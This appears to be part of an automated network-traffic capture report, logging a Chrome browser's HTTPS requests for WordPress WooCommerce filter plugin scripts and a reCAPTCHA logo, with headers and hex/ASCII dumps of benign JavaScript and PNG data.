                                                                                                          2024-12-12 11:58:38 UTC2935INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 73 6c 69 64 65 72 73 28 29 20 7b 0a 20 20 20 20 6a 51 75 65 72 79 2e 65 61 63 68 28 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 74 61 78 72 61 6e 67 65 5f 73 6c 69 64 65 72 27 29 2c 20 66 75 6e 63 74 69 6f 6e 20 28 69 6e 64 65 78 2c 20 69 6e 70 75 74 29 20 7b 0a 09 0a 20 20 20 20 20 20 74 72 79 20 7b 09 20 20 20 20 0a 09 20 20 20 20 76 61 72 20 73 6c 61 67 73 20 3d 20 6a 51 75 65 72 79 28 69 6e 70 75 74 29 2e 64 61 74 61 28 27 73 6c 61 67 73 27 29 2e 73 70 6c 69 74 28 27 2c 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 61 78 20 3d 20 6a 51 75 65 72 79 28 69 6e 70 75 74 29 2e 64 61 74 61 28 27 74 61 78 27 29 3b 0a 09 20 20 20 20 76 61 72 20 73
                                                                                                          Data Ascii: "use strict";function woof_init_sliders() { jQuery.each(jQuery('.woof_taxrange_slider'), function (index, input) { try { var slags = jQuery(input).data('slags').split(','); var tax = jQuery(input).data('tax'); var s


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          137192.168.2.2449933147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:38 UTC744OUTGET /wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.jquery.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:38 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:38 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 47503
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:39 UTC16384INData Raw: 2f 2a 21 0a 43 68 6f 73 65 6e 2c 20 61 20 53 65 6c 65 63 74 20 42 6f 78 20 45 6e 68 61 6e 63 65 72 20 66 6f 72 20 6a 51 75 65 72 79 20 61 6e 64 20 50 72 6f 74 6f 74 79 70 65 0a 62 79 20 50 61 74 72 69 63 6b 20 46 69 6c 6c 65 72 20 66 6f 72 20 48 61 72 76 65 73 74 2c 20 68 74 74 70 3a 2f 2f 67 65 74 68 61 72 76 65 73 74 2e 63 6f 6d 0a 0a 56 65 72 73 69 6f 6e 20 57 4f 4f 46 20 43 75 73 74 6f 6d 0a 46 75 6c 6c 20 73 6f 75 72 63 65 20 61 74 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 68 61 72 76 65 73 74 68 71 2f 63 68 6f 73 65 6e 0a 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 48 61 72 76 65 73 74 20 68 74 74 70 3a 2f 2f 67 65 74 68 61 72 76 65 73 74 2e 63 6f 6d 0a 0a 4d 49 54 20 4c 69 63 65 6e 73 65 2c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75
                                                                                                          Data Ascii: /*!Chosen, a Select Box Enhancer for jQuery and Prototypeby Patrick Filler for Harvest, http://getharvest.comVersion WOOF CustomFull source at https://github.com/harvesthq/chosenCopyright (c) Harvest http://getharvest.comMIT License, https://githu
                                                                                                          2024-12-12 11:58:39 UTC16384INData Raw: 29 3b 0a 20 20 20 20 20 20 69 66 20 28 21 28 74 68 69 73 2e 72 65 73 75 6c 74 73 5f 73 68 6f 77 69 6e 67 20 7c 7c 20 74 68 69 73 2e 69 73 5f 64 69 73 61 62 6c 65 64 29 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 2e 72 65 73 75 6c 74 73 5f 73 68 6f 77 28 29 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 41 62 73 74 72 61 63 74 43 68 6f 73 65 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 64 6f 77 6e 5f 63 68 65 63 6b 65 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 65 76 74 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 72 65 66 2c 20 73 74 72 6f 6b 65 3b 0a 20 20 20 20 20 20 73 74 72 6f 6b 65 20 3d 20 28 72 65 66 20 3d 20 65 76 74 2e 77 68 69 63 68 29 20 21 3d 20 6e 75 6c 6c 20 3f 20 72 65 66 20 3a 20 65 76 74 2e 6b 65 79 43
                                                                                                          Data Ascii: ); if (!(this.results_showing || this.is_disabled)) { return this.results_show(); } }; AbstractChosen.prototype.keydown_checker = function(evt) { var ref, stroke; stroke = (ref = evt.which) != null ? ref : evt.keyC
                                                                                                          2024-12-12 11:58:39 UTC14735INData Raw: 6e 74 61 69 6e 65 72 5b 30 5d 20 3d 3d 3d 20 61 63 74 69 76 65 5f 63 6f 6e 74 61 69 6e 65 72 5b 30 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 2e 61 63 74 69 76 65 5f 66 69 65 6c 64 20 3d 20 74 72 75 65 3b 0a 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 2e 63 6c 6f 73 65 5f 66 69 65 6c 64 28 29 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 43 68 6f 73 65 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 73 75 6c 74 73 5f 62 75 69 6c 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 74 68 69 73 2e 70 61 72 73 69 6e 67 20 3d 20 74 72 75 65 3b 0a 20 20 20 20 20 20 74 68 69 73 2e 73 65 6c 65 63 74 65 64 5f 6f 70 74 69 6f 6e 5f 63 6f 75 6e 74 20
                                                                                                          Data Ascii: ntainer[0] === active_container[0]) { return this.active_field = true; } else { return this.close_field(); } }; Chosen.prototype.results_build = function() { this.parsing = true; this.selected_option_count


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          138192.168.2.2449931142.250.181.1004437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:38 UTC473OUTGET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1
                                                                                                          Host: www.google.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          X-Client-Data: CIS2yQEIpbbJAQipncoBCIb0ygEIlqHLAQiFoM0BCP/QzgEInNLOAQiO084BGPTJzQE=
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:39 UTC778INHTTP/1.1 200 OK
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/recaptcha
                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="recaptcha"
                                                                                                          Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                          Content-Length: 18160
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Server: sffe
                                                                                                          X-XSS-Protection: 0
                                                                                                          Date: Thu, 12 Dec 2024 11:22:55 GMT
                                                                                                          Expires: Thu, 12 Dec 2024 12:12:55 GMT
                                                                                                          Cache-Control: public, max-age=3000
                                                                                                          Age: 2143
                                                                                                          Last-Modified: Wed, 29 Jul 2020 17:15:00 GMT
                                                                                                          Content-Type: image/png
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
                                                                                                          2024-12-12 11:58:39 UTC612INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 98 00 00 01 d0 08 06 00 00 00 9c 30 7c 54 00 00 46 b7 49 44 41 54 78 da ec 9d 5b 6c 5c 47 19 c7 47 71 5b 01 6a cb 03 2d a8 d9 99 b3 be a4 b5 89 51 aa 62 89 e4 cc cc 3a de 3d 9b 4b 9b 36 40 23 4b 50 de 00 55 08 21 28 42 26 21 e5 c1 69 bc 17 97 ab a0 8a 6a 10 42 bd 24 3e 67 f6 ec da 25 14 28 0d 75 02 0f 48 08 54 a4 92 aa e4 a1 94 92 50 35 71 13 db bb 67 77 bd 89 bd cc d9 d8 84 48 ae 62 3b de 62 ef f9 ff a4 bf 66 bd 96 fc 64 9d 9f e6 fb be 33 43 00 00 00 00 b0 42 f4 f7 57 d7 59 df cd 6f 8c a7 bc 87 63 e9 d2 3e 6b a0 f0 4d 24 78 89 0e 4c ec df fa e8 78 22 f2 ad 7f ff 40 f6 9d 3e c4 fb 4e ff 5c c7 16 7d 6f 3e 27 fa ce fc 5a ec 3d f3 62 64 ef 5b 63 91 fd 67 8f 77 ec 39 7e 94 f2 e1 0c 13 ea b0 21 9d a7 0c
                                                                                                          Data Ascii: PNGIHDR0|TFIDATx[l\GGq[j-Qb:=K6@#KPU!(B&!ijB$>g%(uHTP5qgwHb;bfd3CBWYoc>kM$xLx"@>N\}o>'Z=bd[cgw9~!
                                                                                                          2024-12-12 11:58:39 UTC1390INData Raw: af 32 d3 dd d1 12 55 ed d4 54 ef 27 00 80 d5 df 8f f1 25 63 f9 92 49 43 32 c8 bb 08 e6 c1 13 57 04 53 f7 a8 ab 76 3f ec bf e2 c9 4d 50 91 7b 5b 7f f7 37 26 ec 17 b4 74 9e 08 0b f5 85 70 c4 fe f8 86 88 ba 9d 00 00 56 e3 4e 46 35 f5 a4 4a cd ba 16 ff 1d 2b 35 3d 6e 25 bd c0 3f 54 91 b9 24 97 2e 98 fa 8b 47 4b 87 bb 15 26 b3 05 2d 9e f3 fa bb 33 3a 27 28 b7 87 18 b7 bf dc 12 cd dd 7d 9b f8 d9 2d 04 00 b0 7a 76 32 b1 83 13 6d b1 54 e1 fb 56 aa 52 84 64 90 5a 92 de 0a 08 a6 fe e2 61 7e 8f 47 8e 78 7a bd 10 e2 ea 4d fd fd 4b 54 b8 07 98 50 bb 9b b7 0c 37 13 00 c0 ea e8 c9 58 e9 e2 68 3c 7d d1 83 64 90 9a 60 0e 4e 55 3b 3e 7d 7c 5e 30 6b 23 22 53 31 e4 c8 94 5e cf 69 d1 bc c2 b8 33 4c fd 72 9a 39 7c 4f 73 cf d8 fb 08 00 e0 ff 53 2e 8b 3e 56 b9 3b fe 78 79 34 9e
                                                                                                          Data Ascii: 2UT'%cIC2WSv?MP{[7&tpVNF5J+5=n%?T$.GK&-3:'(}-zv2mTVRdZa~GxzMKTP7Xh<}d`NU;>}|^0k#"S1^i3Lr9|OsS.>V;xy4
                                                                                                          2024-12-12 11:58:39 UTC1390INData Raw: 1c c7 eb a1 05 b5 50 2f 22 24 33 bb c9 f6 66 11 c1 1e da 9d d9 6d b3 ef 4d a3 a9 88 62 0d 68 11 73 2b ea ad 08 4a f1 90 25 ec bc 97 58 4f 95 1e 8a 27 2d 68 f6 cd 26 22 82 7f ea 41 14 a4 28 f1 4f 63 d3 d2 7a 10 5b 28 36 91 98 ec ee bc 9d cd a6 19 67 77 b3 61 b5 08 ad 79 49 76 77 be 1f f8 5e e7 f8 3e bc f9 fe de 7b c8 5d 24 62 4e 96 75 23 7b 3e 7a 50 c4 db fa b7 58 b0 73 e9 8e 8b cb 0d b9 40 30 40 a9 64 68 26 3f 44 79 e9 37 82 5d 4c 8b 0a e6 b3 d0 2f e6 2d 9b e4 c4 b2 66 e4 ae 44 8d ec 91 76 94 4b 57 fc ac a1 19 ce 74 a3 73 81 60 80 32 06 d3 33 3b fa 32 c5 21 62 97 7e 21 4c 56 42 bf a0 b7 a8 60 62 10 4c 6b c7 74 aa bd cc 5c 4f d2 39 a1 c5 c5 bd 6d d3 b9 90 da ce e5 92 b6 ba 73 81 60 80 42 b9 f8 3b a9 5d 3c 61 71 ef 77 ca dd 95 d0 2f e6 10 0c b2 9e 98 a2 fa
                                                                                                          Data Ascii: P/"$3fmMbhs+J%XO'-h&"A(Ocz[(6gwayIvw^>{]$bNu#{>zPXs@0@dh&?Dy7]L/-fDvKWts`23;2!b~!LVB`bLkt\O9ms`B;]<aqw/
                                                                                                          2024-12-12 11:58:39 UTC1390INData Raw: 44 40 08 11 51 54 b5 bc 20 a8 2a fa 00 02 2a f5 01 26 b1 cf 99 49 82 80 52 2e 02 a9 05 71 49 76 67 d7 01 04 08 68 41 a8 20 48 69 10 f0 82 40 50 89 a2 f0 40 44 c1 8e e7 ba 8e ed e9 99 43 56 aa 2a 23 bc f6 da 3b 76 fe 3f e9 af 5d c9 6f 5e ef f9 f9 fb be 73 ce b4 4a d6 1a 1b f0 af d9 e0 36 3e 64 6e 82 05 15 99 4a 30 a8 60 10 08 06 b4 0e 13 fe 6a ea c4 bb 98 88 27 a8 08 b0 a0 22 53 b5 c8 50 c1 20 10 0c 68 8d b2 9d 9e 40 79 f0 7b ca a3 af a5 64 b0 98 22 68 91 21 10 0c 68 0f 4c 84 9b a9 93 bc c7 1c b4 c6 10 08 06 81 60 40 9b a0 83 f1 0a 4b 84 8f 51 11 1d c2 75 30 08 04 83 40 30 a0 2d 6c 7a e0 b3 63 ca 83 fe 6f 98 93 7c c1 d0 1a 43 20 18 04 82 01 ed 82 39 e1 c5 54 24 2f 61 ee 82 40 30 08 04 03 da 38 d8 1f 3e 85 89 70 2b 13 c9 41 9c 79 41 a6 2b 98 73 af 78 35 25
                                                                                                          Data Ascii: D@QT **&IR.qIvghA Hi@P@DCV*#;v?]o^sJ6>dnJ0`j'"SP h@y{d"h!hL`@KQu0@0-lzco|C 9T$/a@08>p+AyA+sx5%
                                                                                                          2024-12-12 11:58:39 UTC1390INData Raw: cd 76 59 5e 04 43 07 46 a8 12 cc 22 20 7b f4 73 b6 cb 0c 5b 99 21 18 30 0d 2e 77 e2 95 59 0b 86 89 70 02 5b 93 3b 1c 11 1e 96 4b f2 26 e5 e1 45 5b bc 96 17 65 d5 2e a3 4e fc 76 53 32 39 98 c1 48 c1 f8 8b 45 30 4d c9 1c 47 f4 ea 63 78 c0 19 04 03 7e 00 53 8c 5e 65 39 c9 fb 18 ee 77 5e 2e 6a e6 c2 a3 ba 65 27 67 17 6c bb ab 30 23 9a 33 99 b8 39 93 e9 74 05 13 98 5b 47 98 12 cc 22 62 6d b6 95 d9 a8 ed 94 99 84 64 20 18 30 05 e5 87 d2 13 28 f7 ef 66 3c c2 70 bf 93 11 91 8a 29 82 3f 96 ed d1 d3 0b b3 47 b5 cb 4c 1e be 65 b9 87 d4 4c a6 a3 82 e1 81 12 cc 62 dc 7d 49 8a 95 3b 88 51 1b c7 36 66 08 06 fc 1f 8c 07 6b 2c 11 0d 51 07 cf db ef e4 7f f9 b2 d2 98 90 ef ef 2f db c3 a7 b4 f5 f3 bd 47 49 a6 39 93 81 60 e6 08 4d af dc a6 19 f5 31 9c fc 87 60 c0 61 d2 34 5d
                                                                                                          Data Ascii: vY^CF" {s[!0.wYp[;K&E[e.NvS29HE0MGcx~S^e9w^.je'gl0#39t[G"bmd 0(f<p)?GLeLb}I;Q6fk,Q/GI9`M1`a4]
                                                                                                          2024-12-12 11:58:39 UTC1390INData Raw: e7 49 5d 97 1d a9 60 9a 46 0a 46 cb e5 1d 25 97 ca 0f dd 7d 90 0b 04 93 5e f4 10 1d f5 9a ef 63 b9 65 82 c1 3e 0f 6a d1 87 54 07 fb 29 c5 7e 3e 0a fe 03 9d c9 9c 8c 60 28 13 77 9b 26 98 ae 05 3a 73 d9 85 cc 05 82 49 3d c4 11 8b a9 d7 f8 02 82 49 ee 8d 17 ca e4 06 aa 1f 10 4b 37 77 3e df ce 64 5a 13 10 cc 24 72 e9 1b 46 e6 02 c1 98 b1 9e bf c0 c4 43 94 05 fb 21 98 24 aa 97 20 b4 59 50 25 83 ad 52 8f 9a 35 ca 18 00 8d 32 19 47 7c 79 5c c9 44 95 9d 16 4c c3 18 c1 64 73 95 59 c8 5c 20 18 63 b8 8b 87 17 13 b7 ee 10 2e 6b 68 51 4e 26 7b a1 4c 8e 50 16 5e 62 58 ae a7 24 53 d7 99 cc e4 82 91 4d e2 89 c5 5a 30 06 04 fa dd f9 ca 77 c8 5c 20 18 63 b8 7d b0 7a 3d 71 e5 3a ec 1f 8b fd b4 ff d0 ab d4 6d 14 75 f5 62 18 0b d7 2a c9 b8 62 3b f5 c6 5b 93 5c 91 8d 1f 11 4c
                                                                                                          Data Ascii: I]`FF%}^ce>jT)~>`(w&:sI=IK7w>dZ$rFC!$ YP%R52G|y\DLdsY\ c.khQN&{LP^bX$SMZ0w\ c}z=q:mub*b;[\L
                                                                                                          2024-12-12 11:58:39 UTC1390INData Raw: 99 f8 88 e4 ca 6b 1b 67 6f ba f2 84 00 d0 73 81 08 98 4c 86 4a 39 45 a2 74 ed 88 28 21 60 cc b9 07 59 74 d0 53 d1 b7 c6 78 04 82 00 d2 b0 2c d6 98 67 41 cf 05 22 60 cc 41 f4 85 4b 45 5f ec 18 02 c6 a4 5b f4 57 84 7b c5 8a e8 b2 b2 1d 58 a2 9c 9e 4b 91 35 ea b9 04 11 2e 30 ae d5 c9 06 ac 0e f6 81 00 78 67 30 91 c5 14 2e 1d 58 a2 6c ce 23 92 29 ac 3b 45 5f 48 8c 3f f6 17 a4 57 b8 c4 7b 2e 08 17 38 6a 06 73 95 5e 37 09 80 37 60 fa 57 88 52 f8 37 04 8c 39 4b 94 45 29 f6 5d 49 65 78 a6 00 d2 2a 5c d0 73 81 e3 04 4c c8 e6 54 3f 11 00 6f c0 84 5f 15 bd d1 93 08 18 93 1a fc 52 74 27 95 c8 a6 0a 20 3d c2 a5 38 30 c7 52 20 ff 8a 70 81 e3 04 4c 38 cb a9 79 05 c0 07 0d 8a ab c8 53 08 98 54 8d e8 1e 6f f8 06 f9 a1 cb d7 ff 94 00 d2 20 5c d8 9c a9 76 f6 13 7a 2e f0 0e
                                                                                                          Data Ascii: kgosLJ9Et(!`YtSx,gA"`AKE_[W{XK5.0xg0.Xl#);E_H?W{.8js^77`WR79KE)]Iex*\sLT?o_Rt' =80R pL8ySTo \vz.
                                                                                                          2024-12-12 11:58:39 UTC1390INData Raw: 17 b7 dd 21 e4 02 00 08 86 c4 9c b9 8c f9 3b 72 01 00 04 43 e2 c4 ed 34 e9 8c 0f 0e 0e b2 2c 06 00 08 86 c4 ad b9 38 c8 05 00 10 0c 89 26 17 6a 2e 00 80 60 48 f4 65 31 6a 2e 00 80 60 48 f4 99 0b 35 17 00 40 30 a4 34 72 61 e6 02 00 08 86 44 af b9 48 3a 8c 5c 20 90 65 d9 fc 04 00 c1 90 18 cf b9 b0 5b 0c a6 09 67 cc 59 30 db 3b 3a 3a 16 25 00 08 86 b0 15 19 62 d1 d7 d7 57 ef d3 1b c6 fd 2a 86 26 24 03 08 86 50 73 81 28 b4 b5 b5 2d 93 74 73 78 78 38 ec 28 9c 70 ff 38 c9 a9 d9 80 60 c8 1f d5 5c 24 3d f2 a9 c8 d4 5c e0 07 cd cd cd f3 dc 37 4e 85 ad ea df cf a0 2b 48 9a 70 1a 99 c9 00 82 21 bf 4c f8 df 53 73 81 62 a4 69 ba de e3 73 34 88 25 f4 95 19 92 79 e3 ef 27 98 c9 00 82 21 b9 91 34 15 17 70 cf 38 4b 13 80 ef 84 9b 0d f7 91 8b 33 e4 32 4b 32 1e b3 af 79 83
                                                                                                          Data Ascii: !;rC4,8&j.`He1j.`H5@04raDH:\ e[gY0;::%bW*&$Ps(-tsxx8(p8`\$=\7N+Hp!LSsbis4%y'!4p8K32K2y
                                                                                                          2024-12-12 11:58:39 UTC1390INData Raw: 4d 91 fd f2 9d 6b 59 ee f6 7a 3a bc bf 7c bb d5 63 7f 09 91 f9 c0 63 c5 5a 44 06 43 60 a0 e4 29 cd 3e 1e 77 1f e8 f5 40 7a 5f 5f 5f df f2 9e 9e 9e cb 33 19 84 c5 2c b3 97 b7 c5 ed 73 50 d2 29 b7 55 bd ff 28 09 91 19 71 3f 59 83 c8 60 08 0c 94 9c 9f c9 e7 13 26 24 ed 77 8e e1 09 7b 35 2b f3 93 01 ea 69 20 89 12 2f 8d 21 2c 16 da 47 25 bd 67 fe cc 4f 92 a8 fb 7e 52 10 19 49 c3 23 23 23 eb 10 19 0c 81 81 b9 78 34 53 3e 7e 22 69 bb 69 1d 1d 1d 5d 9a f7 6a 2e aa d5 bd 5a 62 ca b1 eb b8 35 d9 63 79 d2 9f 7d 50 d2 1f 08 4b d1 75 32 39 1f 87 c3 93 61 da 3b 86 c0 c0 5c a7 36 07 87 dd 37 de 70 1f 79 cc ac 8d 15 eb 31 fb 2c 06 96 1a d8 17 bf d1 9f e9 6a 49 77 f8 73 ef 8c 15 ec 92 72 f1 d9 f9 3e 94 24 32 43 ee 0f ab f1 64 30 04 06 e6 2c 34 81 a4 d3 ee 27 df 98 d7 25
                                                                                                          Data Ascii: MkYz:|ccZDC`)>w@z___3,sP)U(q?Y`&$w{5+i /!,G%gO~RI###x4S>~"ii]j.Zb5cy}PKu29a;\67py1,jIwsr>$2Cd0,4'%
                                                                                                          2024-12-12 11:58:39 UTC1390INData Raw: fd e5 44 34 46 20 10 8c e6 ff 5e 06 f8 7b b6 b9 96 c5 ae 15 9f 35 76 59 c1 a1 d7 8b 82 0d cd 64 56 f7 63 fb 32 00 71 3b 73 b1 05 73 9e fb 9f 10 d1 38 81 40 30 ba e5 c2 1c e5 fe 0a b7 5c ae 9d 59 79 d6 b8 0f 0a 9b df 2d 32 ea 7f 97 2a 84 33 32 00 c4 a1 5c 78 59 fc 22 f7 f3 89 28 45 20 10 8c 07 72 f9 83 bf 5f 3a 11 4d 16 37 98 d4 cf ac 94 74 df c1 2c bf 51 7f 9c 54 15 24 03 40 7c cd 5c da b9 f5 0f 8f 7d 04 82 d1 5d 73 b1 e5 c2 fd 8c 91 fc 82 3d 99 dd 39 31 a3 e8 e0 ea 52 d9 70 5c aa ca 41 48 06 80 b8 98 b9 74 70 3f 10 0c 06 ef 17 08 04 e3 45 cd c5 96 4b 20 10 98 22 46 98 39 9f 76 dd b3 d2 df bc 76 9b b1 eb 94 54 38 ed 0f c0 28 97 4b 27 b7 c1 48 24 f2 80 40 20 18 0f 96 c5 6c b9 ac 70 e4 a2 23 4f e7 74 df 9b e9 fb 65 3d 4b e6 0c 99 21 cc 64 00 18 85 72 61 ba
                                                                                                          Data Ascii: D4F ^{5vYdVc2q;ss8@0\Yy-2*32\xY"(E r_:M7t,QT$@|\}]s=91Rp\AHtp?EK "F9vvT8(K'H$@ lp#Ote=K!dra


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          139192.168.2.2449932147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:38 UTC566OUTGET /wp-content/plugins/woocommerce-products-filter/js/html_types/checkbox.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
                                                                                                          2024-12-12 11:58:39 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:38 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 3340
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:39 UTC3340INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 63 68 65 63 6b 62 6f 78 65 73 28 29 20 7b 0a 20 20 20 20 69 66 20 28 69 63 68 65 63 6b 5f 73 6b 69 6e 20 21 3d 20 27 6e 6f 6e 65 27 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 63 68 65 63 6b 62 6f 78 5f 74 65 72 6d 27 29 2e 69 43 68 65 63 6b 28 27 64 65 73 74 72 6f 79 27 29 3b 0a 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 63 68 65 63 6b 62 6f 78 5f 74 65 72 6d 27 29 2e 69 43 68 65 63 6b 28 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 68 65 63 6b 62 6f 78 43 6c 61 73 73 3a 20 27 69 63 68 65 63 6b 62 6f 78 5f 27 20 2b 20 69 63 68 65 63 6b 5f 73 6b 69 6e 2e 73 6b 69 6e 20 2b 20 27 2d 27 20 2b 20 69
                                                                                                          Data Ascii: "use strict";function woof_init_checkboxes() { if (icheck_skin != 'none') { jQuery('.woof_checkbox_term').iCheck('destroy'); jQuery('.woof_checkbox_term').iCheck({ checkboxClass: 'icheckbox_' + icheck_skin.skin + '-' + i


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          140192.168.2.2449935147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:38 UTC564OUTGET /wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0
                                                                                                          2024-12-12 11:58:39 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:39 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1167
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
